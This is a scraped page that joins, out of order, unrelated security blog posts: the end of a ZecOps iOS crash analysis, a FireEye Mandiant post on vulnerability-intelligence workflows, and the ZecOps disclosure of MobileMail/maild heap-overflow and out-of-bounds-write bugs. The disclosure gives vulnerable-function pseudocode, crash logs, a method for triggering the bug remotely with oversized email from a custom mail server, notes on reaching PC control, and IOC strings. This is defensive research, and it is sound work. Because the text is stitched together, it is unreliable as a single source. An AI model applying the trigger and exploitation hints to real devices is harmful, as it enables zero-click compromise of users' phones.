       0x1b040fc94         mov x29, sp                    
       0x1b040fc98         cbz x0, 0x0093fce4             
       0x1b040fc9c         tbnz x0, #63, 0x0093fce4       
       0x1b040fca0         ldr x8, [x0]            // [b]       
       0x1b040fca4         and x8, x8, 0xffffffff8        
       0x1b040fca8         ldrb w8, [x8, #32]             
       0x1b040fcac         tbz w8, #2, 0x0093fd14         

1   CoreFoundation                	0x00000001b1119408 -[__NSDictionaryM removeAllObjects]  + 600
2   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
3   libdispatch.dylib             	0x00000001b0c0bc1c _dispatch_lane_barrier_sync_invoke_and_complete  + 56    
4   UIFoundation                  	0x00000001bb9136b0 __16-[_UICache init]_block_invoke  + 76     
5   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
6   libdispatch.dylib             	0x00000001b0c0201c _dispatch_continuation_pop$VARIANT$mp  + 412
7   libdispatch.dylib             	0x00000001b0c11fa8 _dispatch_source_invoke$VARIANT$mp  + 1308
8   libdispatch.dylib             	0x00000001b0c0ee00 _dispatch_kevent_worker_thread  + 1224   
9   libsystem_pthread.dylib       	0x00000001b0e3e124 _pthread_wqthread  + 320          
10  libsystem_pthread.dylib       	0x00000001b0e40cd4 start_wqthread  + 4 


Thread 13 crashed with ARM Thread State (64-bit):
    x0: 0x0041004100410041   x1: 0x00000001de1ac18a   x2: 0x0000000000000000   x3: 0x0000000000000010
    x4: 0x00000001b0c60388   x5: 0x0000000000000010   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x0000000281f94090   x9: 0x00000001b143f670  x10: 0x0000000142846800  x11: 0x0000004b0000007f
   x12: 0x00000001428468a0  x13: 0x000041a1eb487861  x14: 0x0000000283ed9d10  x15: 0x0000000000000004
   x16: 0x00000001eb487860  x17: 0x00000001b11191b0  x18: 0x0000000000000000  x19: 0x0000000281dce4c0
   x20: 0x0000000282693398  x21: 0x0000000282693330  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000281dce4c8  x25: 0x000000000c000000  x26: 0x000000000000000d  x27: 0x00000001eb48e000
   x28: 0x0000000282693330   fp: 0x000000016b8fe820   lr: 0x00000001b1119408
    sp: 0x000000016b8fe820   pc: 0x00000001b040fca0 cpsr: 0x20000000

[a]: The pointer of the object was overwritten with “0x0041004100410041” which is AAAA in unicode. 

[b] is one of the instructions around the crashed address we’ve added for better understanding, the process crashed on instruction “ldr x8, [x0]” while -[__NSDictionaryM removeAllObjects] was trying to release one the objects.

By reverse engineering -[__NSDictionaryM removeAllObjects], we understand that register x0 was loaded from x28(0x0000000282693330), since register x28 was never changed before the crash.

Let’s take a look at the virtual memory region information of x28: 0x0000000282693330, the overwritten object was stored in MALLOC_NANO region which stores small heap chunks. The heap overflow vulnerability corrupts the same region since it overflows on a 8-bytes heap chunk which is also stored in MALLOC_NANO.

  MALLOC_NANO         	 0x0000000280000000-0x00000002a0000000	 rw-/rwx

This crash is actually pretty close to controlling the PC since it controls the pointer of an Objective-C object. By pointing the value of register x0 to a memory sprayed with a fake object and class with fake method cache, the attackers could control the PC pointer, this phrack blog explains the details.

Summary

  1. It is rare to see that user-provided inputs trigger and control remote vulnerabilities. 
  2. We prove that it is possible to exploit this vulnerability using the described technique.
  3. We have observed real world triggers with a large allocation size.
  4. We have seen real world triggers with values that are controlled by the sender.
  5. The emails we looked for were missing / deleted.
  6. Success-rate can be improved. This bug had in-the-wild triggers in 2010 on an iPhone 2G device.
  7. In our opinion, based on the above, this bug is worth an out of band patch.

How Can Apple Improve the Logs?

The lack of details in iOS logs and the lack of options to choose the granularity of the data  for both individuals and organizations need to change to get iOS to be on-par with MacOS, Linux, and Windows capabilities. In general, the concept of hacking into a phone in order to analyze it, is completely flawed and should not  be the normal way to do it.

We suggest Apple improve its error diagnostics process to help individuals, organizations, and SOCs to investigate their devices. We have a few helpful technical suggestions:

  1. Crashes improvement: Enable to see memory next to each pointer / register
  2. Crashes improvement: Show stack / heap memory / memory near registers
  3. Add PIDs/PPIDs/UID/EUID to all applicable events
  4. Ability to send these logs to a remote server without physically connecting the phone – we are aware of multiple cases where the logs were mysteriously deleted
  5. Ability to perform complete digital forensics analysis of suspected iOS devices without a need to hack into the device first.

Questions for Apple

  • How many triggers have you seen to this heap overflow since iOS 3.1.3? 
  • How were you able to determine within one day that all of the triggers to this bug were not malicious and did you actually go over each event ? 
  • When are you planning to patch this vulnerability?
  • What are you going to do about enhancing forensics on mobile devices (see the list above)?

MailDemon Bounty

If you experienced any of the three symptoms below, use another mail application (e.g. Outlook for Desktop), and send the relevant emails (including the Email Source) to the address maildemon@zecops.org– there are instructions at the bottom of this post.

Suspected emails may appear as follows:

Bounty details: We will validate if the email contains an exploit code. For the first two submissions containing Mail exploits that were verified by ZecOps team, we will provide:

  • $10,000 USD bounty
  • One license for ZecOps Gluon (DFIR for mobile devices) for 1 year
  • One license for ZecOps Neutrino (DFIR for endpoints and servers) for 1 year. 

We will provide an additional bounty of up to $7,337 for exploit primitive as described above.

We will determine what were the first two valid submissions according to the date they were received in our email server and if they contain an exploit code. A total of $27,337 USD in bounties and licenses of ZecOps Gluon & Neutrino. 

For suspicious submissions, we would also request device logs in order to determine other relevant information about potential attackers exploiting vulnerabilities in Mail and other vulnerabilities on the device.

Please note: Not every email that causes the symptoms above and shared with us will qualify for a bounty as there could be other bugs in MobileMail/maild – we’re only looking for ones that contain an attack.

How to send the emails using Outlook :

  1. Open Outlook from a computer and locate the relevant email
  2. Select Actions => Other Actions => View Source
  3. And send the source to maildemon@zecops.org

How to send the suspicious email via Gmail:

  1. Locate and select the relevant message
  2. Click on the three dots “… “ in the menu and click on Forward as an attachment
  3. Send the email with the “.eml” attachment to maildemon@zecops.org

* Please note that we haven’t published all details intentionally. This bug is still unpatched and we want to avoid further misuse of this bug

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Putting the Model to Work: Enabling Defenders With Vulnerability Intelligence — Intelligence for Vulnerability Management, Part Four

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Organizations often have to make difficult choices when it comes to patch prioritization. Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. This problem is compounded by the ever-changing threat landscape and increased access to zero-days.

At FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. 

In this blog post, we’ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.

Functions of Vulnerability Intelligence

Vulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:


Figure 1: Vulnerability intelligence can help with risk assessment and informed decision making

Tailoring Vulnerability Prioritization

We believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.


Figure 2: Patch Prioritization Philosophy

Integration of Vulnerability Intelligence in Internal Workflows

Based on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.


Figure 3: Integration of vulnerability intelligence into internal workflows

Tools and Use Cases for Operationalizing Vulnerability Intelligence

1. Automate Processes by Fusing Intelligence with Internal Data

Automation is valuable to security teams with limited resources. Similar to automated detecting and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant Intelligence API) and aggregated into a SIEM, Threat Intelligence Platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (“FIVE”), described in more detail below for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.

Security teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level-agreements (SLAs) could state that ‘high’ risk vulnerabilities that have an exploitation rating of ‘available,’ ‘confirmed,’ or ‘wide’ must be patched within a set number of days. Of course, the SLA will depend on the company’s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process. Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability originally released in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light. 

Another potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization’s unique threat profile and business operations.

2. Communicating with Internal Stakeholders

Teams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.

Data-informed intelligence analysis may help convince stakeholders outside of the security organization the importance of patching quickly, even when this is inconvenient to business operations. Threat Intelligence can inform an organization’s appropriate use of resources for security given the potential business impact of security incidents.

3. Threat Modeling

Organizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.

Examples

The following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.

Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization

The FireEye Intelligence Vulnerability Explorer (“FIVE”) tool is available for customers here. It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.


Figure 4: FIVE Tool for Windows and MacOS

In this scenario, an organization’s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. 


Figure 5: FIVE tool startup screen waiting for file input


Figure 6: FIVE tool after successfully regexing the CVE-IDs from the file

After selecting all CVE-IDs, the user clicked the “Fetch Vulnerabilities” button, causing the application to make the necessary two-stage API call to the Intelligence API.

The output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye’s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.


Figure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports

FIVE can also facilitate other use cases for vulnerability intelligence. For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization’s vulnerability management program.

Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling

CVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients when we observed exploitation by ransomware operators and Chinese espionage group, APT41.

In cases like these, threat intelligence can help impacted organizations find the “signal” in the “noise” and prioritize patching using knowledge of exploitation and the motives and targeting patterns of threat actors behind the exploitation. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state sponsored group. This support the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.

Example 3: Intelligence Reduces Unnecessary Resource Expenditure — Automating Vulnerability Prioritization and Communications

Another common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes help an organization discern when it is necessary to respond in an all-hands-on-deck manner.

Take the case of the CVE-2019-12650, originally disclosed on Sept. 25, 2019 with an NVD rating of “High.” Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle along with numerous other vulnerabilities rated High or Critical. As previously discussed, we have experts review the vulnerability and determine that it required the highest level of privileges available to successfully exploit, and there was no evidence of exploitation in the wild.

This is a case where threat intelligence reporting as well as automation can effectively minimize the need to unnecessarily spin up resources. Although the public NVD score rated this vulnerability high, Mandiant Intelligence rated it as “low” risk due to the high level of privileges needed to use it and lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability could be patched in the regular cycle and does not necessitate use of additional resources to patch out-of-band. When Mandiant ratings are automatically integrated into the patching ticket generation process, this can support efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the prioritization.

Vulnerabilities: Managed

Because we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers, to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.

Mandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps—not just patching—to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Additional Resources

Zero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill — Intelligence for Vulnerability Management, Part One

Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two

Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

Mandiant offers Intelligence Capability Development (ICD) services to help organizations optimize their ability to consume, analyze and apply threat intelligence.

The FIVE tool is available on the FireEye Market. It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. 

Mandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.

You’ve Got (0-click) Mail!

You’ve Got (0-click) Mail!

Updates

Impact & Key Details (TL;DR) :

  • The vulnerability allows remote code execution capabilities and enables an attacker to remotely infect a device by sending emails that consume significant amount of memory
  • The vulnerability does not necessarily require a large email – a regular email which is able to consume enough RAM would be sufficient. There are many ways to achieve such resource exhaustion including RTF, multi-part, and other methods
  • Both vulnerabilities were triggered in-the-wild
  • The vulnerability can be triggered before the entire email is downloaded, hence the email content won’t necessarily remain on the device
  • We are not dismissing the possibility that attackers may have deleted remaining emails following a successful attack
  • Vulnerability trigger on iOS 13: Unassisted (/zero-click) attacks on iOS 13 when Mail application is opened in the background
  • Vulnerability trigger on iOS 12: The attack requires a click on the email. The attack will be triggered before rendering the content. The user won’t notice anything anomalous in the email itself
  • Unassisted attacks on iOS 12 can be triggered (aka zero click) if the attacker controls the mail server
  • The vulnerabilities exist at least since iOS 6 – (issue date: September 2012) – when iPhone 5 was released
  • The earliest triggers we have observed in the wild were on iOS 11.2.2 in January 2018
  • FAQ

This post is the first part of a series – See post number 2

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

the mail-demon vulnerability
were you targeted by this vulnerability?
Check Now

Multiple Vulnerabilities in MobileMail/Maild

Introduction

Following a routine iOS Digital Forensics and Incident Response (DFIR) investigation, ZecOps found a number of suspicious events that affecting the default Mail application on iOS dating as far back as Jan 2018. ZecOps analyzed these events and discovered an exploitable vulnerability affecting Apple’s iPhones and iPads. ZecOps detected multiple triggers in the wild to this vulnerability on enterprise users, VIPs, and MSSPs, over a prolonged period of time.

The attack’s scope consists of sending a specially crafted email to a victim’s mailbox enabling it to trigger the vulnerability in the context of iOS MobileMail application on iOS 12 or maild on iOS 13. Based on ZecOps Research and Threat Intelligence, we surmise with high confidence that these vulnerabilities – in particular, the remote heap overflow – are widely exploited in the wild in targeted attacks by an advanced threat operator(s).

The suspected targets included:

  • Individuals from a Fortune 500 organization in North America
  • An executive from a carrier in Japan 
  • A VIP from Germany
  • MSSPs from Saudi Arabia and Israel
  • A Journalist in Europe
  • Suspected: An executive from a Swiss enterprise

Few of the suspicious events even included strings commonly used by hackers (e.g. 414141…4141) – see FAQ. After verifying that it wasn’t a red-team exercise, we validated that these strings were provided by the email-sender. Noteworthy, although the data confirms that the exploit emails were received and processed by victims’ iOS devices, corresponding emails that should have been received and stored on the mail-server were missing. Therefore, we infer that these emails may have been deleted intentionally as part of attack’s operational security cleanup measures.

We believe that these attacks are correlative with at least one nation-state threat operator or a nation-state that purchased the exploit from a third-party researcher in a Proof of Concept (POC) grade and used ‘as-is’ or with minor modifications (hence the 4141..41 strings).

While ZecOps refrain from attributing these attacks to a specific threat actor, we are aware that at least one ‘hackers-for-hire’ organization is selling exploits using vulnerabilities that leverage email addresses as a main identifier.

We advise to update as soon as an iOS update is available.

Exploitation timeline

We are aware of multiple triggers in the wild that happened starting from Jan 2018, on iOS 11.2.2. It is likely that the same threat operators are actively abusing these vulnerabilities presently. It is possible that the attacker(s) were using this vulnerability even earlier. We have seen similarities between some of the suspected victims during triggers to these vulnerabilities.

Affected versions:

  • All tested iOS versions are vulnerable including iOS 13.4.1. 
  • Based on our data, these bugs were actively triggered on iOS 11.2.2 and potentially earlier.
  • iOS 6 and above are vulnerable. iOS 6 was released in 2012. Versions prior to iOS 6 might be vulnerable too but we haven’t checked earlier versions. At the time of iOS 6 release, iPhone 5 was in the market.

ZecOps Customers & Partners

ZecOps Gluon iOS DFIR customers can detect attacks leveraging MobileMail/maild vulnerabilities.

Thank you

Before we dive deeper, we would like to thank Apple’s product security and  the engineering team that delivered a beta patch to block these vulnerabilities from further abuse once deployed to GA.

Vulnerability Details

ZecOps found that the implementation of MFMutableData in the MIME library lacks error checking for system call ftruncate() which leads to the Out-Of-Bounds write. We also found a way to trigger the OOB-Write without waiting for the failure of the system call ftruncate. In addition, we found a heap-overflow that can be triggered remotely.

We are aware of remote triggers of both vulnerabilities in the wild. 

Both the OOB Write bug, and the Heap-Overflow bug, occurred due to the same problem: not handling the return value of the system calls correctly.

The remote bug can be triggered while processing the downloaded email, in such scenario, the email won’t get fully downloaded to the device as a result.

Affected Library: /System/Library/PrivateFrameworks/MIME.framework/MIME

Vulnerable function: -[MFMutableData appendBytes:length:]

Abnormal behavior once the vulnerabilities are exploited

Besides a temporary slowdown of mobile mail application, users should not observe any other anomalous behavior. Following an exploit attempt (both successful / unsuccessful) on iOS 12 – users may notice a sudden crash of the Mail application.

On iOS13, besides a temporary slowdown, it would not be noticeable. Failed attacks would not be noticeable on iOS 13 if another attack is carried afterwards and deletes the email. 

In failed attacks, the emails that would be sent by the attacker would show the message: “This message has no content.”.. As seen in the following picture below:

Crash Forensics Analysis

Part of the a crash (out of multiple crashes) experienced by the user, is as follows.

The crashed instruction was stnp x8, x9, [x3], meaning that the value of x8 and x9 has been written into x3 and crashed due to accessing an invalid address 0x000000013aa1c000 which was stored in x3.

Thread 3 Crashed:
0   libsystem_platform.dylib      	0x000000019e671d88 _platform_memmove +88
       0x19e671d84         b.ls 0x00008da8                
       0x19e671d88         stnp x8, x9, [x3]              
       0x19e671d8c         stnp x10, x11, [x3, #16]       
       0x19e671d90         add x3, x3, 0x20               
       0x19e671d94         ldnp x8, x9, [x1]              
1   MIME                          	0x00000001b034c4d8 -[MFMutableData appendBytes:length:] + 356 
2   Message                       	0x00000001b0b379c8 -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] + 808
Registers:
x0: 0x000000013aa1b05a  x5: 0x0000000000000006
x1: 0x0000000102f0cfc6  x6: 0x0000000000000000
x2: 0x0000000000004a01  x7: 0x0000000000000000
x3: 0x000000013aa1c000  x8: 0x3661614331732f0a
x4: 0x000000000000004b  x9: 0x48575239734c314a

In order to find out why the process crashed, we need to take a look at the implementation of MFMutableData.

The below call tree is taken from the crash log experienced only by a selected number of  devices.

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
|
+--  -[MFMutableData appendData:]
   |
   +--  -[MFMutableData appendBytes:length:]
       |
       +-- memmove()

By analyzing the MIME library, the pseudo code of -[MFMutableData appendBytes:length:] as follows:

-(void)appendBytes:(const void*)bytes length:(uint64_t)len{
    //...
    uint64_t new_length = old_length + len;
    [self setLength:new_length];
    if (!self->flush){
        self->flush = true;
    }
    //...
    memmove(dest, bytes, len);
}

The following call stack was executed before the crash happened:

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
|
+--  -[MFMutableData appendData:]
   |
   +--  -[MFMutableData appendBytes:length:]
       |
       +-- -[MFMutableData setLength:]
          |
          +-- -[MFMutableData _flushToDisk:capacity:]
             |
             +-- ftruncate()

A file is used to store the actual data if the data size reaches the threshold, when the data changes, the content and the size of the mapped file should be changed accordingly. The system-call ftruncate() is called inside -[MFMutableData _flushToDisk:capacity:] to adjust the size of the mapped file.

Following is the pseudo code of -[MFMutableData _flushToDisk:capacity:]

- (void)_flushToDisk:(uint64_t)length capacity:(uint64_t)capacity;{
    boolean_t flush;
    //...
    if (self->path){
        boolean_t flush = self->flush; //<-line [a]
    }else{
        //...
        flush = true;
    }
    if(flush){ //<-line [b]
        //...
        ftruncate(self->path, capacity);
        //...
        self->flush = false;
    }
}

The man page of ftruncate specifies:

ftruncate() and truncate() cause the file named by path, or referenced by fildes, to be truncated
 (or extended) to length bytes in size. If the file size exceeds length, any extra data is discarded. 
If the file size is smaller than length, the file is extended and filled with zeros to the indicated 
length.  The ftruncate() form requires the file to be open for writing.
RETURN VALUES
    A value of 0 is returned if the call succeeds.  If the call fails a -1 is returned, and the global 
    variable errno specifies the error.

According to the man page: “If the call fails a -1 is returned, and the global variable errno specifies the error.” which means under certain conditions, this system call would fail to truncate the file and return an error code.

However, upon failure of the ftruncate system call , _flushToDisk continues anyway, which means the mapped file size is not extended and the execution finally reaches the memmove() in the appendBytes() function, causing the mmap file an out-of-bound (OOB) write.

Finding another trigger

We know that the crash was due to a failure ftruncate() system call, does it mean we can’t do anything but to wait for the system call to fail?

Let’s take another look at the -[MFMutableData _flushToDisk:capacity:] function.

- (void)_flushToDisk:(uint64_t)length capacity:(uint64_t)capacity;{
    boolean_t flush;
    //...
    if (self->path){
        boolean_t flush = self->flush; //<-line [a]
    }else{
        //...
        flush = true;
    }
    if(flush){ //<-line [b]
        //...
        ftruncate(self->path, capacity);
        //...
        self->flush = false;
    }
}

As you can see in line [b], it checks whether the flush flag is true before calling ftruncate(). This means if we can set the flush flag to false at line [a], the ftruncate() won’t be executed at all.

If someone calls -[MFMutableData setLength:](set flush to  0), before calling -[MFMutableData appendData:], ftruncate() won’t be executed due to flush==0) and  there will be a similar result.

The following backtrace is a demonstration of a local POC. Combining this OOB Write with an additional vulnerability and/or methods to control the memory layout, this vulnerability could be triggered remotely – for example by controlling the selectors (as we have observed in other DFIR events as well as in Google Project Zero blog post).

Thread 0 Crashed:
0   libsystem_platform.dylib      	0x00000001cc442d98 _platform_memmove  + 88
       0x1cc442d8c         stnp x14, x15, [x0, #16]       
       0x1cc442d90         subs x2, x2, 0x40              
       0x1cc442d94         b.ls 0x00008db8    // 0x00000001cc44bf30 
       0x1cc442d98         stnp x8, x9, [x3]              
       0x1cc442d9c         stnp x10, x11, [x3, #16]       
       0x1cc442da0         add x3, x3, 0x20               
       0x1cc442da4         ldnp x8, x9, [x1]              

1   MIME                          	0x00000001ddbf0518 -[MFMutableData appendBytes:length:]  + 352
       0x1ddbf050c         mov x1, x20                    
       0x1ddbf0510         mov x2, x19                    
       0x1ddbf0514         bl 0x000498f4    // 0x00000001ddc39e08 
       0x1ddbf0518         ldp x29, x30, [sp, #80]        
       0x1ddbf051c         ldp x20, x19, [sp, #64]        
       0x1ddbf0520         ldp x22, x21, [sp, #48]        
       0x1ddbf0524         ldp x24, x23, [sp, #32]        

Although this is indeed a vulnerability that should be patched, we suspect that it was triggered by accident while the attackers were trying to exploit the following vulnerability.

2nd Vulnerability: Remote Heap Overflow in MFMutable

We continued our investigation to the remotely triggered events that were suspicious and determined that there is another vulnerability in the same area

The backtrace can be seen as following:

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
|
+--  -[MFMutableData appendData:]
    |
   +--  -[MFMutableData appendBytes:length:]
       |
       +-- -[MFMutableData _mapMutableData]

While analyzing the code flow, we determined the following:

  • The function [MFDAMessageContentConsumer consumeData:length:format:mailMessage:] gets called when downloading an email in raw MIME form, and also will get called multiple times until the email is downloaded in Exchange mode. It will create a new NSMutableData object, and call appendData: for any new streaming data that belongs to the same email/MIME message. For other protocols like IMAP it uses -[MFConnection readLineIntoData:] instead but the logic and vulnerability are the same.
  • NSMutableData sets a threshold of 0x200000 bytes, if the data is bigger than 0x200000 bytes, it will write the data into a file, and then use the mmap systemcall to map the file into the device memory. The threshold size of 0x200000 can be easily excessed, so every time new data needs to append, the file will be re-mmap’ed, and the file size as well as the mmap size getting bigger and bigger.
  • Remapping is done inside -[MFMutableData _mapMutableData:], the vulnerability is inside this function.

Pseudocode of the vulnerable function as below:

-[MFMutableData _mapMutableData:] calls function MFMutableData__mapMutableData___block_invoke when the mmap system call fails

-[MFMutableData _mapMutableData:]
{
  //...
  result = mmap(0LL, v8, v9, 2, v6, 0LL);
  if (result == -1){
      //...
      result = (void *)MFMutableData__mapMutableData___block_invoke(&v21);
  }
  //...
}

The pseudo code of MFMutableData__mapMutableData___block_invoke is as follows, it allocates a size 8 heap memory then replaces the data->bytes pointer with the allocated memory.

void MFMutableData__mapMutableData___block_invoke(__int64 data)
{
  __int64 result; // x0

  data->vm = 0;    
  data->length = 0;
  data->capacity = 8; // Reset MFMutableData capacity to 8
  result = calloc(data->capacity, 1); // Allocate a new piece of memory, size of 8
  data->bytes = result; // replace the mapping memory pointer, which overwrites the -1 in case of mmap failure.
  return result;
}

After the execution of -[MFMutableData _mapMutableData:], the process continues execution of -[MFMutableData appendBytes:length:], causing a heap overflow when copying data to the allocated memory.

-[MFMutableData appendBytes:length:] 
{
  int length = [self length];
  //...
  bytes = self->bytes;
  if(!bytes){
     bytes = [self _mapMutableData]; //Might be a data pointer of a size 8 heap
  }
  copy_dst = bytes + length;
  //...
  platform_memmove(copy_dst, append_bytes, append_length); // It used append_length to copy the memory, causing an OOB writing in a small heap
}

append_length is the length of a chunk of data from the streaming. Since MALLOC_NANO is a very predictable memory region, it is possible to exploit this vulnerability.

An attacker doesn’t need to drain every last bit of the memory to cause mmap to fail, as mmap requires a continuous memory region.

Reproduction

According to the man page of mmap, the mmap would fail when MAP_ANON was specified and insufficient memory was available.

The goal is to cause mmap to fail, ideally, a big enough email is going to make it happen inevitably. However, we believe that the vulnerabilities can be triggered in using other tricks that can exhaust the resources. Such tricks can be achieved through multi-part, RTF, and other formats – more on that later.

Another important factor that can affect exploitability, is the hardware specs:

  • iPhone 6 has 1GB
  • iPhone 7 has 2GB
  • iPhone X has 3GB

Older devices have smaller physical RAM, and smaller virtual memory space, hence it is not necessary to drain every last bit of RAM in order to trigger this bug, mmap will fail when it cannot find a continuous memory of given size in the available virtual memory space.

We have determined that MacOS is not vulnerable to both vulnerabilities.

In iOS 12, it is easier to trigger the vulnerability because the data streaming is done within the same process, as the default mail application (MobileMail), it deals with much more resources, which eats up allocation of virtual memory space, especially the UI rendering, whereas in iOS 13, MobileMail pass data streaming to a background process namely maild. It concentrates its resources in parsing the e-mails, which reduces the risk of virtual memory space accidentally running out.

Remote Reproduction / POC

Since MobileMail/maild didn’t explicitly set the max limit for email size, it is possible to set up a custom email server and send an email that has several GB of plain text. iOS MIME/Message library chunks data into an average of roughly 0x100000 bytes while streaming data, so failing to download the entire email is totally fine.

Please note that this is just one example of how to trigger this vulnerability. Attackers do not need to send such email in-order to trigger this vulnerability, and other tricks with multi-part, RTF, or other formats may accomplish the same objective with a standard size email.

Indicators of Compromise

# Type of indicator Purpose IOC
1 String in raw email Part of the malicious email sent AAAAAAAA AND AAAAATEy AND EA\r\nAABI AND "$\x0e\xce\xa0\xd4\xc7\xcb\x08" AND T8hlGOo9 AND OKl2N\r\nC (updated)
3 String in raw email Part of the malicious email sent 3r0TRZfh AND AAAAAAAAAAAAAAAA AND \x0041\x0041\x0041\x0041 (unicode AAAA) (updated)
4 String in raw email Part of the malicious email sent \n/s1Caa6 AND J1Ls9RWH
5 String in raw email Part of the malicious email sent ://44449
6 String in raw email Part of the malicious email sent ://84371
7 String in raw email Part of the malicious email sent ://87756
8 String in raw email Part of the malicious email sent ://94654

Patch

